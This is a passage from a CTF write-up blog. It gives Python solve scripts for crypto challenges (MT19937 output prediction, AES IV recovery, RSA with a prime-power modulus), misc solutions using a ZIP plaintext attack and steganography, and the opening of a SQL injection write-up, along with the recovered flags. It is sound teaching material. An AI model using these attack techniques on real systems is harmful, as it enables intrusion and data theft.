class="hljs-number">1597424641</span>, <span class="hljs-number">3940594526</span>, <span class="hljs-number">846332502</span>, <span class="hljs-number">3177694219</span>, <span class="hljs-number">1253960959</span>, <span class="hljs-number">1980517147</span>, <span class="hljs-number">2066843131</span>, <span class="hljs-number">3452017677</span>, <span class="hljs-number">743662084</span>, <span class="hljs-number">3332614739</span>, <span class="hljs-number">1230416894</span>, <span class="hljs-number">1790783329</span>, <span class="hljs-number">3339256849</span>, <span class="hljs-number">1223003548</span>, <span class="hljs-number">3155010716</span>, <span class="hljs-number">211801309</span>, <span class="hljs-number">3302823875</span>, <span class="hljs-number">2203405123</span>, <span class="hljs-number">4027118331</span>, <span class="hljs-number">3928670766</span>, <span class="hljs-number">1551556760</span>, <span class="hljs-number">2018355543</span>, <span class="hljs-number">2473765725</span>, <span class="hljs-number">2451139992</span>, <span class="hljs-number">3923372144</span>, <span class="hljs-number">2197282188</span>, <span class="hljs-number">2056399604</span>, <span class="hljs-number">1294675076</span>, <span class="hljs-number">1121984516</span>, <span class="hljs-number">113881691</span>, <span class="hljs-number">1646921221</span>, <span class="hljs-number">3151728031</span>, <span class="hljs-number">695534775</span>, <span class="hljs-number">3870352246</span>, <span class="hljs-number">1614457851</span>, <span class="hljs-number">1764207471</span>, <span class="hljs-number">3516853329</span>, <span class="hljs-number">3276173646</span>, <span class="hljs-number">3559299512</span>, <span class="hljs-number">1239291648</span>, <span class="hljs-number">2417317314</span>, <span class="hljs-number">908861203</span>, <span class="hljs-number">3945977517</span>, <span class="hljs-number">1789725976</span>, <span 
class="hljs-number">1094256533</span>, <span class="hljs-number">1194981603</span>, <span class="hljs-number">3817224425</span>, <span class="hljs-number">4294621339</span>, <span class="hljs-number">3041360046</span>, <span class="hljs-number">1319794040</span>, <span class="hljs-number">1881403289</span>, <span class="hljs-number">151945988</span>, <span class="hljs-number">3036988698</span>, <span class="hljs-number">2214811128</span>, <span class="hljs-number">240957157</span>, <span class="hljs-number">509921068</span>, <span class="hljs-number">1538884056</span>, <span class="hljs-number">119208760</span>, <span class="hljs-number">1425862614</span>, <span class="hljs-number">2923918837</span>, <span class="hljs-number">845827337</span>, <span class="hljs-number">507023267</span>, <span class="hljs-number">2955299274</span>, <span class="hljs-number">1247972138</span>, <span class="hljs-number">766611587</span>, <span class="hljs-number">2012831811</span>, <span class="hljs-number">3441161631</span>, <span class="hljs-number">2645633381</span>, <span class="hljs-number">2328705244</span>, <span class="hljs-number">512481283</span>, <span class="hljs-number">461960350</span>, <span class="hljs-number">1704754200</span>, <span class="hljs-number">1327914555</span>, <span class="hljs-number">147555684</span>, <span class="hljs-number">3349647800</span>, <span class="hljs-number">3062151439</span>, <span class="hljs-number">3090502250</span>, <span class="hljs-number">937966533</span>, <span class="hljs-number">82567652</span>, <span class="hljs-number">725403325</span>, <span class="hljs-number">4001427888</span>, <span class="hljs-number">524069543</span>, <span class="hljs-number">2291211027</span>, <span class="hljs-number">2084465414</span>, <span class="hljs-number">1292961088</span>, <span class="hljs-number">4278389999</span>, <span class="hljs-number">1309916992</span>, <span class="hljs-number">3249380344</span>, <span 
class="hljs-number">3493113838</span>, <span class="hljs-number">83526738</span>, <span class="hljs-number">4193860366</span>, <span class="hljs-number">2438456426</span>, <span class="hljs-number">3510215857</span>, <span class="hljs-number">175761668</span>, <span class="hljs-number">2820499306</span>, <span class="hljs-number">1792194251</span>, <span class="hljs-number">1225332544</span>, <span class="hljs-number">3896268058</span>, <span class="hljs-number">2752286952</span>, <span class="hljs-number">3182785082</span>, <span class="hljs-number">956435024</span>, <span class="hljs-number">3996152048</span>, <span class="hljs-number">2924148655</span>, <span class="hljs-number">2895936126</span>, <span class="hljs-number">1856977607</span>, <span class="hljs-number">1289267397</span>, <span class="hljs-number">690722358</span>, <span class="hljs-number">1937429718</span>, <span class="hljs-number">1531967867</span>, <span class="hljs-number">2098208046</span>, <span class="hljs-number">1815108525</span>, <span class="hljs-number">1567735201</span>, <span class="hljs-number">146084074</span>, <span class="hljs-number">2093897143</span>, <span class="hljs-number">2793246617</span>, <span class="hljs-number">1146380003</span>, <span class="hljs-number">2523936201</span>, <span class="hljs-number">2301399576</span>, <span class="hljs-number">2052473947</span>, <span class="hljs-number">3470101770</span>, <span class="hljs-number">3722302451</span>, <span class="hljs-number">3345343326</span>, <span class="hljs-number">2271545308</span>, <span class="hljs-number">2657475692</span>, <span class="hljs-number">2211989611</span>, <span class="hljs-number">2428885922</span>, <span class="hljs-number">2097052181</span>, <span class="hljs-number">3554955904</span>, <span class="hljs-number">1704837589</span>, <span class="hljs-number">1494941216</span>, <span class="hljs-number">3403108634</span>, <span class="hljs-number">911409695</span>, <span 
class="hljs-number">3550042769</span>, <span class="hljs-number">379101531</span>, <span class="hljs-number">406655201</span>, <span class="hljs-number">1317011271</span>, <span class="hljs-number">2336674904</span>, <span class="hljs-number">3930303124</span>, <span class="hljs-number">3038552846</span>, <span class="hljs-number">3207659329</span>, <span class="hljs-number">2785076651</span>, <span class="hljs-number">1203119790</span>, <span class="hljs-number">1146774748</span>, <span class="hljs-number">2218279443</span>, <span class="hljs-number">494710315</span>, <span class="hljs-number">3507507044</span>, <span class="hljs-number">922439915</span>, <span class="hljs-number">35699688</span>, <span class="hljs-number">2690622469</span>, <span class="hljs-number">1458912003</span>, <span class="hljs-number">3911367650</span>, <span class="hljs-number">983115567</span>, <span class="hljs-number">2813252332</span>, <span class="hljs-number">839947939</span>, <span class="hljs-number">514499603</span>, <span class="hljs-number">3894529528</span>, <span class="hljs-number">326817358</span>, <span class="hljs-number">1479783722</span>, <span class="hljs-number">4242051909</span>, <span class="hljs-number">3492972915</span>, <span class="hljs-number">3473946915</span>, <span class="hljs-number">3348053727</span>, <span class="hljs-number">3681386488</span>, <span class="hljs-number">584266203</span>, <span class="hljs-number">3531080708</span>, <span class="hljs-number">3262223061</span>, <span class="hljs-number">2904040234</span>, <span class="hljs-number">3897643811</span>, <span class="hljs-number">2706405422</span>, <span class="hljs-number">914107260</span>, <span class="hljs-number">3011659451</span>, <span class="hljs-number">308811435</span>, <span class="hljs-number">4103121550</span>, <span class="hljs-number">4023430755</span>, <span class="hljs-number">2975129044</span>, <span class="hljs-number">4139500620</span>, <span 
class="hljs-number">1763891748</span>, <span class="hljs-number">57665971</span>, <span class="hljs-number">3149249501</span>, <span class="hljs-number">870034516</span>, <span class="hljs-number">4142837134</span>, <span class="hljs-number">3130156432</span>, <span class="hljs-number">1708266697</span>, <span class="hljs-number">1242161643</span>, <span class="hljs-number">1163332264</span>, <span class="hljs-number">108174709</span>, <span class="hljs-number">1633896347</span>, <span class="hljs-number">2820171620</span>, <span class="hljs-number">1708875131</span>, <span class="hljs-number">724124719</span>, <span class="hljs-number">3562786877</span>, <span class="hljs-number">518616285</span>, <span class="hljs-number">3643662732</span>, <span class="hljs-number">3375737681</span>, <span class="hljs-number">2550728441</span>, <span class="hljs-number">1823319080</span>, <span class="hljs-number">1775922455</span>, <span class="hljs-number">3838709569</span>, <span class="hljs-number">177763087</span>, <span class="hljs-number">946611206</span>, <span class="hljs-number">4054832304</span>, <span class="hljs-number">1473954380</span>, <span class="hljs-number">3475817789</span>, <span class="hljs-number">2590152780</span>, <span class="hljs-number">3587873907</span>, <span class="hljs-number">3437231816</span>, <span class="hljs-number">2708036272</span>, <span class="hljs-number">3883447173</span>, <span class="hljs-number">655291275</span>, <span class="hljs-number">707049339</span>, <span class="hljs-number">1352718730</span>, <span class="hljs-number">3543000675</span>, <span class="hljs-number">962283943</span>, <span class="hljs-number">4170075509</span>, <span class="hljs-number">1897499376</span>, <span class="hljs-number">643615933</span>, <span class="hljs-number">856277089</span>, <span class="hljs-number">3299581344</span>, <span class="hljs-number">4093601146</span>, <span class="hljs-number">2638625975</span>, <span 
class="hljs-number">1563647962</span>, <span class="hljs-number">890552183</span>, <span class="hljs-number">3138216177</span>, <span class="hljs-number">222946344</span>, <span class="hljs-number">4219020514</span>, <span class="hljs-number">3218803481</span>, <span class="hljs-number">3093722090</span>, <span class="hljs-number">1210144957</span>, <span class="hljs-number">3499543439</span>, <span class="hljs-number">4239553976</span>, <span class="hljs-number">3582176749</span>, <span class="hljs-number">654186756</span>, <span class="hljs-number">3005601303</span>, <span class="hljs-number">1252241368</span>, <span class="hljs-number">2459425960</span>, <span class="hljs-number">3587113096</span>, <span class="hljs-number">3506651695</span>, <span class="hljs-number">3673557784</span>, <span class="hljs-number">4157576483</span>, <span class="hljs-number">733173716</span>, <span class="hljs-number">1505997631</span>, <span class="hljs-number">394626148</span>, <span class="hljs-number">1322270695</span>, <span class="hljs-number">84604461</span>, <span class="hljs-number">891267254</span>, <span class="hljs-number">518241635</span>, <span class="hljs-number">1068682198</span>, <span class="hljs-number">3696554893</span>, <span class="hljs-number">3111393676</span>, <span class="hljs-number">1398539042</span>, <span class="hljs-number">901276151</span>, <span class="hljs-number">483471144</span>, <span class="hljs-number">1952219546</span>, <span class="hljs-number">2884270239</span>, <span class="hljs-number">2215979688</span>, <span class="hljs-number">4138748504</span>, <span class="hljs-number">1623101775</span>, <span class="hljs-number">3102260771</span>, <span class="hljs-number">4276348310</span>, <span class="hljs-number">1228132323</span>, <span class="hljs-number">2250922664</span>, <span class="hljs-number">833982365</span>, <span class="hljs-number">3402246096</span>, <span class="hljs-number">2085678412</span>, <span 
class="hljs-number">2707953187</span>, <span class="hljs-number">590837194</span>, <span class="hljs-number">3421635592</span>, <span class="hljs-number">3488064851</span>, <span class="hljs-number">3655525766</span>, <span class="hljs-number">1029679348</span>, <span class="hljs-number">2448841196</span>, <span class="hljs-number">89284911</span>, <span class="hljs-number">3970560858</span>, <span class="hljs-number">334986490</span>, <span class="hljs-number">3063032848</span>, <span class="hljs-number">3172506167</span>, <span class="hljs-number">2391313449</span>, <span class="hljs-number">3589023591</span>, <span class="hljs-number">4269870234</span>, <span class="hljs-number">3275101066</span>, <span class="hljs-number">1716650872</span>, <span class="hljs-number">483502324</span>, <span class="hljs-number">2116979028</span>, <span class="hljs-number">815078501</span>, <span class="hljs-number">3475316209</span>, <span class="hljs-number">1003463022</span>, <span class="hljs-number">2418993968</span>, <span class="hljs-number">4251101825</span>, <span class="hljs-number">346290993</span>, <span class="hljs-number">3286645593</span>, <span class="hljs-number">2654742976</span>, <span class="hljs-number">99974317</span>, <span class="hljs-number">4124695845</span>, <span class="hljs-number">3732280507</span>, <span class="hljs-number">1536249568</span>, <span class="hljs-number">1440486445</span>, <span class="hljs-number">1605422491</span>, <span class="hljs-number">393607563</span>, <span class="hljs-number">1141210694</span>, <span class="hljs-number">43848150</span>, <span class="hljs-number">1656624711</span>, <span class="hljs-number">2170355702</span>, <span class="hljs-number">327988021</span>, <span class="hljs-number">974870171</span>, <span class="hljs-number">2169013815</span>, <span class="hljs-number">3689546490</span>, <span class="hljs-number">3576028106</span>, <span class="hljs-number">4258679518</span>, <span 
class="hljs-number">14944446</span>, <span class="hljs-number">1786133397</span>, <span class="hljs-number">264814384</span>, <span class="hljs-number">1969519378</span>, <span class="hljs-number">1769400868</span>, <span class="hljs-number">3098042628</span>, <span class="hljs-number">22547518</span>, <span class="hljs-number">3195136230</span>, <span class="hljs-number">42683806</span>, <span class="hljs-number">1288550835</span>, <span class="hljs-number">59638233</span>, <span class="hljs-number">3534385409</span>, <span class="hljs-number">2517101496</span>, <span class="hljs-number">3632913591</span>, <span class="hljs-number">3894777481</span>, <span class="hljs-number">2912655780</span>, <span class="hljs-number">1614602217</span>, <span class="hljs-number">3498478791</span>, <span class="hljs-number">1309795895</span>, <span class="hljs-number">3961554801</span>, <span class="hljs-number">3625321205</span>, <span class="hljs-number">308138165</span>, <span class="hljs-number">2885107341</span>, <span class="hljs-number">1003378866</span>, <span class="hljs-number">3462951062</span>, <span class="hljs-number">1914176024</span>, <span class="hljs-number">3130918711</span>, <span class="hljs-number">3919345882</span>, <span class="hljs-number">3556964414</span>, <span class="hljs-number">2382442356</span>, <span class="hljs-number">3968605965</span>, <span class="hljs-number">2388890395</span>, <span class="hljs-number">1955471760</span>, <span class="hljs-number">2358533573</span>, <span class="hljs-number">2323037969</span>, <span class="hljs-number">4273118548</span>, <span class="hljs-number">3577096972</span>, <span class="hljs-number">4251790958</span>, <span class="hljs-number">2321545863</span>, <span class="hljs-number">2057106840</span>, <span class="hljs-number">4000766037</span>, <span class="hljs-number">1551111470</span>, <span class="hljs-number">368761666</span>, <span class="hljs-number">951769999</span>, <span 
class="hljs-number">778229999</span>, <span class="hljs-number">4235748487</span>, <span class="hljs-number">2020142699</span>, <span class="hljs-number">3577752281</span>, <span class="hljs-number">1269488993</span>, <span class="hljs-number">1350156870</span>, <span class="hljs-number">529843408</span>, <span class="hljs-number">669182431</span>, <span class="hljs-number">3871401874</span>, <span class="hljs-number">2180265713</span>, <span class="hljs-number">3850183472</span>, <span class="hljs-number">46915226</span>, <span class="hljs-number">3150800412</span>, <span class="hljs-number">1139932212</span>, <span class="hljs-number">2523557119</span>, <span class="hljs-number">1462042012</span>, <span class="hljs-number">301258444</span>, <span class="hljs-number">165757583</span>, <span class="hljs-number">530704729</span>, <span class="hljs-number">1848179734</span>, <span class="hljs-number">1792342751</span>, <span class="hljs-number">2597916820</span>, <span class="hljs-number">4041946457</span>, <span class="hljs-number">1127104524</span>, <span class="hljs-number">3768573884</span>, <span class="hljs-number">2614008065</span>, <span class="hljs-number">741308521</span>, <span class="hljs-number">477746986</span>, <span class="hljs-number">507411825</span>, <span class="hljs-number">4235293189</span>, <span class="hljs-number">2251811519</span>, <span class="hljs-number">811234592</span>, <span class="hljs-number">1985999307</span>, <span class="hljs-number">844715613</span>, <span class="hljs-number">1640781314</span>, <span class="hljs-number">3538036580</span>, <span class="hljs-number">2764130557</span>, <span class="hljs-number">2863454433</span>, <span class="hljs-number">1831736583</span>, <span class="hljs-number">3857379783</span>, <span class="hljs-number">658928449</span>, <span class="hljs-number">1149649578</span>, <span class="hljs-number">103125751</span>, <span class="hljs-number">2968446555</span>, <span 
class="hljs-number">885660863</span>, <span class="hljs-number">707321834</span>, <span class="hljs-number">1728646363</span>, <span class="hljs-number">2706995220</span>, <span class="hljs-number">3062604255</span>, <span class="hljs-number">4177710084</span>, <span class="hljs-number">3076079677</span>, <span class="hljs-number">879366858</span>, <span class="hljs-number">3936728615</span>, <span class="hljs-number">8828906</span>, <span class="hljs-number">1656874220</span>, <span class="hljs-number">2904085639</span>, <span class="hljs-number">397694272</span>, <span class="hljs-number">1604508691</span>, <span class="hljs-number">2083663236</span>, <span class="hljs-number">2138468690</span>, <span class="hljs-number">1365350684</span>, <span class="hljs-number">2870684769</span>, <span class="hljs-number">384435793</span>, <span class="hljs-number">1063724290</span>, <span class="hljs-number">1142482048</span>, <span class="hljs-number">809857977</span>, <span class="hljs-number">4192515435</span>, <span class="hljs-number">267878653</span>, <span class="hljs-number">206018017</span>, <span class="hljs-number">3441769173</span>, <span class="hljs-number">925696591</span>, <span class="hljs-number">2250932557</span>, <span class="hljs-number">1973183700</span>, <span class="hljs-number">577661907</span>, <span class="hljs-number">2551314381</span>, <span class="hljs-number">1350352597</span>, <span class="hljs-number">4151551172</span>, <span class="hljs-number">774849773</span>, <span class="hljs-number">2391866106</span>, <span class="hljs-number">3444137245</span>, <span class="hljs-number">403261487</span>, <span class="hljs-number">2724363448</span>, <span class="hljs-number">3572536490</span>, <span class="hljs-number">1077243504</span>, <span class="hljs-number">302416473</span>, <span class="hljs-number">3457548858</span>, <span class="hljs-number">564604707</span>, <span class="hljs-number">1238169871</span>, <span 
class="hljs-number">2356838464</span>, <span class="hljs-number">3083335214</span>, <span class="hljs-number">3844937218</span>, <span class="hljs-number">1272458074</span>, <span class="hljs-number">1782962159</span>, <span class="hljs-number">1543604321</span>, <span class="hljs-number">3212537899</span>, <span class="hljs-number">426074894</span>, <span class="hljs-number">3053843067</span>, <span class="hljs-number">2436223151</span>, <span class="hljs-number">94019340</span>, <span class="hljs-number">4147659323</span>, <span class="hljs-number">2893920832</span>, <span class="hljs-number">626619793</span>, <span class="hljs-number">3976626567</span>, <span class="hljs-number">1884877146</span>, <span class="hljs-number">2696384440</span>, <span class="hljs-number">1177352315</span>, <span class="hljs-number">1082374195</span>, <span class="hljs-number">3289271804</span>, <span class="hljs-number">1485815836</span>, <span class="hljs-number">120127000</span>, <span class="hljs-number">3349349501</span>, <span class="hljs-number">164243314</span>, <span class="hljs-number">1703351326</span>, <span class="hljs-number">1017276501</span>, <span class="hljs-number">413737931</span>, <span class="hljs-number">408060344</span>, <span class="hljs-number">472141408</span>, <span class="hljs-number">172738862</span>, <span class="hljs-number">4001606849</span>, <span class="hljs-number">1888805432</span>, <span class="hljs-number">2927218529</span>, <span class="hljs-number">1293362241</span>, <span class="hljs-number">1941759619</span>, <span class="hljs-number">1760659398</span>, <span class="hljs-number">274865852</span>, <span class="hljs-number">978985751</span>, <span class="hljs-number">3867215904</span>, <span class="hljs-number">177291528</span>, <span class="hljs-number">1083045308</span>, <span class="hljs-number">3888975618</span>, <span class="hljs-number">979933689</span>, <span class="hljs-number">2211634008</span>, <span 
class="hljs-number">3899294132</span>, <span class="hljs-number">1174569575</span>]<br>Hash=<span class="hljs-string">'b0cfb7293d6842e3279f4ef0fc88284174349e111e5b9beb28263df72c9db0bf'</span><br>res=<span class="hljs-number">1045726758250168034320246515934682860724576730763168865120</span><br><br><br><span class="hljs-keyword">from</span> mt19937predictor <span class="hljs-keyword">import</span> MT19937Predictor<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br>predictor = MT19937Predictor()<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> randist:<br> predictor.setrandbits(i, <span class="hljs-number">32</span>)<br>x = predictor.getrandbits(<span class="hljs-number">128</span>)<br><br><span class="hljs-keyword">from</span> os <span class="hljs-keyword">import</span> urandom<br><span class="hljs-keyword">from</span> hashlib <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> tqdm <span class="hljs-keyword">import</span> tqdm<br><br><br><span class="hljs-comment"># for i in tqdm(range(256)):</span><br><span class="hljs-comment"># for j in range(256):</span><br><span class="hljs-comment"># for k in range(256):</span><br><span class="hljs-comment"># if sha256(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big')).hexdigest() == Hash:</span><br><span class="hljs-comment"># print(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big'))</span><br><span class="hljs-comment"># exit()</span><br><br>tmp = <span class="hljs-string">b'\xfeV\xe8'</span><br><span class="hljs-comment"># y = predictor.getrandbits(192)</span><br><span class="hljs-comment"># print(res ^ y)</span><br><span class="hljs-comment"># print(bin(3096872116674666632134706098360014813425478687167245803096)[2:])</span><br><br>res = <span 
class="hljs-string">'11111100100110011011010100000010100111101010001110010110101000111010000101111001111100001100100001111110000100000010001010110111001001000101111101101110101101110110111010111010101111001011000'</span><br>n3 = res[<span class="hljs-number">151</span>:]<br>n3 = <span class="hljs-built_in">int</span>(n3, <span class="hljs-number">2</span>)<br>n3 = <span class="hljs-built_in">hex</span>(n3)[<span class="hljs-number">2</span>:]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">affine</span>(<span class="hljs-params">s</span>):<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">hex</span>((<span class="hljs-built_in">int</span>(s,<span class="hljs-number">16</span>)*<span class="hljs-number">13</span>+<span class="hljs-number">7</span>)%<span class="hljs-number">16</span>)[<span class="hljs-number">2</span>]<br><br><span class="hljs-keyword">from</span> string <span class="hljs-keyword">import</span> *<br><br>flag3 = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">str</span>(n3):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> digits + <span class="hljs-string">'abcdef'</span>:<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">hex</span>((<span class="hljs-built_in">int</span>(j, <span class="hljs-number">16</span>)*<span class="hljs-number">13</span>+<span class="hljs-number">7</span>)%<span class="hljs-number">16</span>)[<span class="hljs-number">2</span>] == i:<br> flag3 += j<br><span class="hljs-comment"># print(flag3)</span><br><span class="hljs-comment"># 64406e6365</span><br><br>tmp = <span class="hljs-built_in">int</span>(tmp.<span class="hljs-built_in">hex</span>(), <span class="hljs-number">16</span>)<br>n2 = <span class="hljs-built_in">int</span>(res[<span class="hljs-number">127</span>:<span class="hljs-number">151</span>], <span 
class="hljs-number">2</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(n2 ^ tmp)[<span class="hljs-number">2</span>:])<br><span class="hljs-comment"># 6c795f</span><br><span class="hljs-comment"># for i in range(10, 135):</span><br><span class="hljs-comment"># n1 = int(res[:i], 2)</span><br><span class="hljs-comment"># if len(hex(n1 ^ x)[2:]) == 32:</span><br><span class="hljs-comment"># print(i)</span><br><span class="hljs-comment"># print(hex(n1 ^ x)[2:])</span><br><br><br><span class="hljs-comment"># flag = 0x16ef9b7e65eaccdac7f2a82242f97461fe795f64406e6365</span><br><span class="hljs-comment"># print(n2s(flag))</span><br><span class="hljs-comment"># flag = 0x365ac09e91965ba65b83ea0952bf789afe795f64406e6365</span><br><span class="hljs-comment"># print(n2s(flag))</span><br>flag = <span class="hljs-number">0x7730775f796f755f63616e5f7233616c6c795f64406e6365</span><br><span class="hljs-built_in">print</span>(n2s(flag))<br><span class="hljs-comment"># flag = 0xf5e518dca89d28ad12a466f3332b5280fe795f64406e6365</span><br><span class="hljs-comment"># print(n2s(flag))</span><br><br><span class="hljs-comment"># flag{w0w_you_can_r3ally_d@nce}</span><br></code></pre></td></tr></table></figure><h4 id="Puzzle"><a href="#Puzzle" class="headerlink" title="Puzzle"></a>Puzzle</h4><p>First, call the c3pto function repeatedly to obtain the key. Because the IV is prepended to the plaintext, the first CBC block is effectively an encryption of 0, so encrypting 16 zeros in ECB mode yields the IV. After decrypting, strip the 16-byte IV at the front and apply b2l to get n. Since n is p raised to the k-th power, with k a random number from 3 to 10, p and k can be recovered by brute-forcing with iroot. Then phi is p^4-p^3, and standard RSA decryption finishes it.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># ans = 38003142990385686484863558905791098358375993231657244276476071305023256088640</span><br><span class="hljs-comment"># for i in range(3000):</span><br><span class="hljs-comment"># ans = c3pto(ans)</span><br><span class="hljs-comment"># if len(long_to_bytes(ans)) == 16:</span><br><span class="hljs-comment"># print(long_to_bytes(ans))</span><br><span class="hljs-comment"># print(i)</span><br><span class="hljs-comment"># break</span><br>key = <span class="hljs-string">b'\xe3+\x91\t\x98\xf3\x1e\xc1:GdW\xa7\x9c\xed\xc8'</span><br><br>cipher = <span class="hljs-string">b'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'</span><br><span class="hljs-keyword">from</span> base64 <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># print(b64decode(cipher))</span><br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br>aes = AES.new(key, AES.MODE_ECB)<br>iv = aes.encrypt(<span 
class="hljs-string">b'0'</span>*<span class="hljs-number">16</span>)<br><span class="hljs-comment"># iv = b'<\xf1t)J\xb94\x94\x96k\xb3\xa6\xd0l\x1f\x18'</span><br><span class="hljs-comment"># print(len(iv))</span><br>aes = AES.new(key, AES.MODE_CBC, iv)<br><span class="hljs-comment"># print(bytes_to_long(aes.decrypt(b64decode(cipher))[16:]))</span><br>n = <span class="hljs-number">19209965997158564458599426535615189346237703496045679441198889186529298504385500315300858252334278042879481030281960025750521154318185790710641511623567832710989099210486337028817922251775767021777833942939023835580209108176900034824071310400122746519500929050334780969464809573760328858928658748895124912280866856571808137524159014499316165158298761321248693949148115133146106269946018966323108608643836818832785190113666217836218758294687951294121101955423935651223760908371479767792064795630252603554097609662539504557607461888291327133613619713698345562630317793015946148694714490016060968925545951172488437985831826972785576084275409669229862762443491692171458878474685119308316241206455155694540420685430375577176075295978069023366059607462061629192082865373658402109500592414165189103641554508666871252420362142243485533235063443441025568589997857565370711406020287496458933312763364958191565948739439205476692493847358590862725642567789840967000383557787723069595323077977262425701895249973531782211968509966975011018992933981548960459201170574752250944309953087122735910011216847418821359974253955871350852537720167519448564234327088343848690653057152835902497926042210633524751259700612688363509034075347508068983857341774110169700566750980411747707871434322483776697117528855422836417531280306040595223427728965335382104916768028932242437073011633148580699244233075226275465717020930179682652090351693927054148463091805199843110474656706805030383726651185759366445767520387462237742665695113469732166866246476846112511949175707400235827763043877998183139478846395273878738117635053213482511267899409073319
3226361777537532269515922485937976349665991399772388721397960468392351155664481353730638831836994949983037350384382753327305729403941493686341892251753278811372338966651828844911034352886809190060883995056847456555950315611326987545276629529435068813158170690823902054787362572088738335891773343913632258874832438998334332913261810760087047758552754566575308536675397251987093487164542963055804002441751864022715424662848335470359948420027756835213050500577294799638589135949755879898985814242501638839907383377834819866500082619067419468232672548637154121177897443704368253245514204975147693342503301921844252239673318375741456151277008424086433210309669337358030499431697081307189511178107489812792122478536534259554160073644974772253911579253927334216606449192146737795612311912838169178570116934403812068138348378295739329366212651044519758844001</span><br>e = <span class="hljs-number">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</span><br>c = <span class="hljs-number">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</span><br><br><br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># for k in range(3, 10):</span><br><span class="hljs-comment"># if iroot(n, k)[1]:</span><br><span class="hljs-comment"># print(iroot(n, k)[0])</span><br><span class="hljs-comment"># print(k)</span><br>k = <span class="hljs-number">4</span> <br>p = <span 
class="hljs-number">20935418603755826153357961486749000137883878122092541278485245382546346099923598569473814209357669395236788185259189925906627960621490996925200115559569329810746744675867738485473466021581185385430988547168263735484625716958718825113577345085361945421237478366338611831738408648424304228723729310335432168121087334054958276987167490905779911687736536416815227240962562460212183301435420718431023950641725670461044591993133883921646824589614644103106984493917214402278641218422432546374433956301830629567708335305598359150744372547912472684947785245810663217040977994966632748245272393755319650187559761562868158211001</span><br><span class="hljs-built_in">print</span>(isPrime(p))<br>phi = p ** <span class="hljs-number">4</span> - p ** <span class="hljs-number">3</span><br>d = invert(e, phi)<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n)))[<span class="hljs-number">64</span>:])<br><span class="hljs-comment"># b'flag{6354ce3ac23cdfeccf16eb1a53df4423}'</span><br></code></pre></td></tr></table></figure><h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><h4 id="一袋米"><a href="#一袋米" class="headerlink" title="一袋米"></a>一袋米</h4><p>Found the original challenge online.</p><p><a href="https://blog.csdn.net/weixin_46079186/article/details/120941245">https://blog.csdn.net/weixin_46079186/article/details/120941245</a></p><p>Compress Yahiko.png into a zip with WinRAR and run a plaintext attack with the ARCHPR tool. After extracting, open the docx, select all and change the color to red to get the flag.</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dns">flag{c05909321b5e318bf6b0e<span class="hljs-number">41586f31882</span>}<br></code></pre></td></tr></table></figure><h4 id="国际歌"><a href="#国际歌" class="headerlink" title="国际歌"></a>国际歌</h4><p>Extract a bmp image with foremost, open it in stegsolve, choose Analyse > Data Extract, check the 0 channel of each of r, g and b, and Save Bin to get the flag image.</p><p><img
src="https://tva1.sinaimg.cn/large/008i3skNgy1gvrkhxfm7wj60ab01u0sj02.jpg" alt="img"></p><h4 id="Host-log"><a href="#Host-log" class="headerlink" title="Host_log"></a>Host_log</h4><p>搜到原题</p><p><a href="https://blog.csdn.net/weixin_46079186/article/details/120941245">https://blog.csdn.net/weixin_46079186/article/details/120941245</a></p><p>写个脚本,先把4个文件放一块,得到所有的ip,一个一个ip过滤,把ip出现多次的都过滤掉了,最后发现了8.8.4.4,只出现过一次。查找到ip:192.168.100.115,账号名:lucy。</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>{<span class="hljs-number">192.168.100.115</span>-lucy}<br></code></pre></td></tr></table></figure><h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><p>web两个送分题。。</p><h4 id="baby-sql"><a href="#baby-sql" class="headerlink" title="baby_sql"></a>baby_sql</h4><p>输入admin 123的时候显示 you are not admin</p><p>然后尝试了一下万能密码 Hack detected 然后fuzz了一下发现好多都被ban了。</p><p>然后之前遇到过BUUCTF的一道题目,是利用到 \ 来转义引号,然后实现注入的。</p><p><strong>payload</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td 